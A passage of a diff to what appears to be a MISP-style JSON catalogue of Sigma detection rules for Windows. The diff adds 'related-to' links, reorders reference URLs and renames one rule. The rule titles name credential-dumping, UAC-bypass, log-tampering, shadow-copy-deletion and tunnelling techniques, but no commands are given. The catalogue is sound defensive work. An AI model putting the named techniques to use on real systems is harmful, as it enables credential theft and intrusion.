@@ -41768,6 +53610,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "value": "Set Windows System File with Attrib" }, @@ -41798,6 +53649,15 @@ "attack.t1135" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "value": "Turla Group Lateral Movement" }, @@ -41822,6 +53682,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "value": "Suspicious Extrac32 Alternate Data Stream Execution" }, @@ -41848,6 +53717,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", "value": "NodejsTools PressAnyKey Lolbin" }, @@ -41872,6 +53750,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" }, 
@@ -41913,10 +53800,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://nodejs.org/api/cli.html", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ @@ -41924,6 +53811,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "value": "Node.exe Process Abuse" }, @@ -41949,6 +53845,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", "value": "PowerShell Script Run in AppData" }, @@ -41965,9 +53870,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ 
@@ -41976,6 +53881,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "value": "UAC Bypass Using ChangePK and SLUI" }, @@ -41992,8 +53906,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" ], "tags": [ @@ -42004,6 +53918,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", "value": "Droppers Exploiting CVE-2017-11882" }, @@ -42029,6 +53959,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "value": "Fsutil Behavior Set SymlinkEvaluation" }, 
@@ -42053,6 +53992,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "value": "Findstr LSASS" }, @@ -42092,8 +54040,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" @@ -42103,6 +54051,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "value": "Change PowerShell Policies to an Insecure Level" }, @@ -42119,9 +54076,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://twitter.com/pabraeken/status/990717080805789697", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" ], "tags": [ 
@@ -42155,6 +54112,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "value": "Netsh RDP Port Forwarding" }, @@ -42203,6 +54169,15 @@ "attack.t1090.003" ] }, + "related": [ + { + "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "value": "Tor Client or Tor Browser Use" }, @@ -42219,12 +54194,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/Wietze/status/1542107456507203586", "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://twitter.com/Wietze/status/1542107456507203586", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" ], "tags": [ @@ -42235,6 +54210,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", "value": "Process Dump via Rundll32 and Comsvcs.dll" }, 
@@ -42251,16 +54235,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" ], "tags": [ @@ -42268,11 +54252,20 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41421f44-58f9-455d-838a-c398859841d4", "value": "ETW Logging Tamper In .NET Processes" }, { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2022/09/06", @@ -42292,8 +54285,17 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Potential WinAPI Access Via CommandLine" + "value": "Potential WinAPI Calls Via CommandLine" }, { "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", @@ -42316,6 +54318,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9494479d-d994-40bf-a8b1-eea890237021", "value": "Suspicious Add Scheduled Task Parent" }, @@ -42341,6 +54352,15 @@ "car.2013-08-001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" }, 
@@ -42357,8 +54377,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" ], "tags": [ @@ -42366,6 +54386,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", "value": "Trickbot Malware Recon Activity" }, @@ -42413,6 +54442,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93199800-b52a-4dec-b762-75212c196542", "value": "RunXCmd Tool Execution As System" }, @@ -42429,8 +54467,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://twitter.com/pabraeken/status/990758590020452353", "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], 
@@ -42439,6 +54477,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, @@ -42467,6 +54514,29 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", "value": "Koadic Execution" }, @@ -42491,6 +54561,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "value": "Disable Windows IIS HTTP Logging" }, @@ -42515,6 +54594,15 @@ "attack.t1217" ] }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "value": "Suspicious Where Execution" }, 
@@ -42532,8 +54620,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://curl.se/docs/manpage.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", + "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" ], "tags": [ @@ -42541,6 +54629,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", "value": "Suspicious Curl Change User Agents" }, @@ -42565,6 +54662,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "value": "Windows Credential Manager Access via VaultCmd" }, @@ -42605,8 +54711,8 @@ "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" ], "tags": [ 
@@ -42616,6 +54722,22 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "value": "SOURGUM Actor Behaviours" }, @@ -42632,8 +54754,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" ], "tags": [ @@ -42641,6 +54763,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" }, 
@@ -42657,9 +54788,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/974806438316072960", "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], @@ -42668,6 +54799,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", "value": "Capture Credentials with Rpcping.exe" }, @@ -42694,6 +54834,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "value": "Renamed CreateDump Process Dump" }, @@ -42710,8 +54859,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ 
@@ -42720,6 +54869,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" }, @@ -42736,9 +54901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://github.com/jpillora/chisel/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", + "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" ], "tags": [ @@ -42746,6 +54911,15 @@ "attack.t1090.001" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "value": "Chisel Tunneling Tool Usage" }, @@ -42770,6 +54944,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "value": "Impacket Tool Execution" }, 
@@ -42810,8 +54993,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ @@ -42843,6 +55026,15 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", "value": "Suspicious ConfigSecurityPolicy Execution" }, @@ -42859,8 +55051,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" ], "tags": [ @@ -42870,6 +55062,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "value": "Process Access via TrolleyExpress Exclusion" }, 
@@ -42886,9 +55094,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -42921,6 +55129,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "value": "Bypass UAC via Fodhelper.exe" }, @@ -42945,6 +55162,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", "value": "NPS Tunneling Tool" }, @@ -42970,6 +55196,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "value": "Dumpert Process Dumper" }, 
@@ -43020,6 +55255,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", "value": "Invoke-Obfuscation RUNDLL LAUNCHER" }, @@ -43044,6 +55288,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", "value": "Suspicious Dosfuscation Character in Commandline" }, @@ -43068,6 +55321,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "value": "Discover Private Keys" }, @@ -43093,6 +55355,15 @@ "attack.t1556.002" ] }, + "related": [ + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", "value": "Dropping Of Password Filter DLL" }, @@ -43120,6 +55391,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + 